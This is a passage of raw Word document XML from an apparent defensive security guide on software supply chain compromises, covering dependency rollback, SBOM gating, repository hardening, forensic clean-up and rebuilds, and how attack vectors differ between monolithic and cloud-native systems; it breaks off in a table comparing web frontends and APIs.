        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Systematic Dependency Downgrade or Clean Upgrade:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identify the exact version of the library carrying the vulnerability or malicious payload. Force a strict rollback to the last known-good, cryptographically verified version in the project manifest, or upgrade to a clean patch released by upstream maintainers. Update </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>lockfiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ( </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>packagelock.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>poetry.lock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) to ensure the fixed state is locked permanently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A16DF5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enforce Automated Software Bill of Materials (SBOM) Gating:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deploy continuous scanning tools (like OWASP Dependency-Track or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Snyk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>) directly into the deployment pipeline. Configure these gates to automatically fail the build if any new package lacks verified provenance, contains unresolved high-severity CVEs, or originates from an untrusted third-party source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59044D0F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Harden Code Repositories &amp; Implement Multi-Party Approval:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enforce strict branch protection rules on all source code repositories. Require multi-factor authentication (MFA) for all repository contributors, mandate cryptographic signing of git commits, and implement a strict policy where no single developer can push code to production without explicit peer code review and approval from a separate authorized team member.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150D186F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>3. Blast Radius Clean-Up (Post-Exploit Recovery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326F27F3"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Because supply chain compromises often run silently with broad permissions, clearing the environment requires a meticulous forensic sweep and a total rebuilding process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5C7602" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Deep Log Analysis &amp; Provenance Auditing:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Analyze CI/CD pipeline logs, container registry activity, and cloud access logs (such as AWS CloudTrail) to isolate the exact moment the malicious package was introduced. Audit historical network flow logs for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>anomalous outbound HTTP/HTTPS requests to track precisely what system credentials or data sets the malware successfully exfiltrated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2817AD" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Persistence Hunting Across the Infrastructure:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Malicious post-install scripts or poisoned binaries frequently attempt to establish permanent backdoors. Inspect system start-up scripts, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> jobs, container orchestration manifests, and cloud IAM configurations to ensure the attacker did not provision shadow administrative accounts, rogue SSH keys, or unauthorized API tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1020FF86" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Total Environment Re-Provisioning from Source:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Do not attempt to surgically clean or patch a running operating system or container cluster that has executed poisoned supply chain code. Completely tear down the compromised infrastructure layers. Rebuild and deploy entirely fresh application nodes from trusted source code baselines using clean, verified container base images and automated, hardened Infrastructure as Code (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>IaC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>) templates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF76995" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Context &amp; Variations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9A51EC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1. Environment Differences: Monolith vs. Cloud-Native</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D458794"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lastRenderedPageBreak/>
        <w:t>The way a Software Supply Chain Failure manifests depends entirely on the layout of the application architecture and where its dependencies reside.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6EFF1F"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Traditional Monolithic On-Premise Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403E379B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Blueprint:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The application codebase is a single large unit containing all business logic, typically pulling dependencies during an initial build phase and running on fixed, long-lived server infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE80C01" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Manifestation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Supply chain failures usually target the open-source libraries packaged directly inside the monolithic binary (e.g., an outdated database connector or utility framework). Because the server infrastructure is static, an attacker who exploits a library flaw (like a remote code execution vulnerability) can establish long-term persistence on the host operating system, configure local backdoors, and slowly pivot into the surrounding corporate network over a period of months.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A213BE9"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Modern Cloud-Native / Microservices / Serverless Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2804204E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Blueprint:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Applications are broken down into hundreds of tiny, ephemeral microservices, deployed in short-lived containers (Docker) or serverless execution blocks (AWS Lambda), and heavily managed via automated pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41580ED4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Manifestation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The supply chain surface area explodes. Attackers don't just target code libraries; they target the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>build and deployment ecosystem</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . Vulnerabilities manifest as poisoned base container images downloaded from public hubs, compromised third-party</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3DA139"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GitHub Actions used to build code, or malicious infrastructure plugins. Because serverless and container instances are destroyed and recreated constantly, attackers shift their focus away from host operating system persistence. Instead, they write malware designed to compromise the CI/CD pipeline itself or instantly hijack cloud IAM roles to steal data from global cloud resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595EE91D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>2. API vs. Web Frontends: Changing Attack Vectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2921DC79"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 xml:space="preserve">When a supply chain attack targets a headless API (REST or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>) instead of a traditional web frontend, the vectors shift away from client-side script manipulation to deep data serialization and integration abuse.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1477"/>
        <w:gridCol w:w="3701"/>
        <w:gridCol w:w="4172"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="3155F92A" w14:textId="77777777" w:rsidTr="00B064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13C6C1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Feature /</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Atack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78BCA7D0" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Traditonal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> Web Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="787EBE43" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Headless API (REST/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>GraphQL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="56659241" w14:textId="77777777" w:rsidTr="00B064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449E98" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Atack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> Vector</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Focus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4584FAFF" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Malicious packages injected into</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
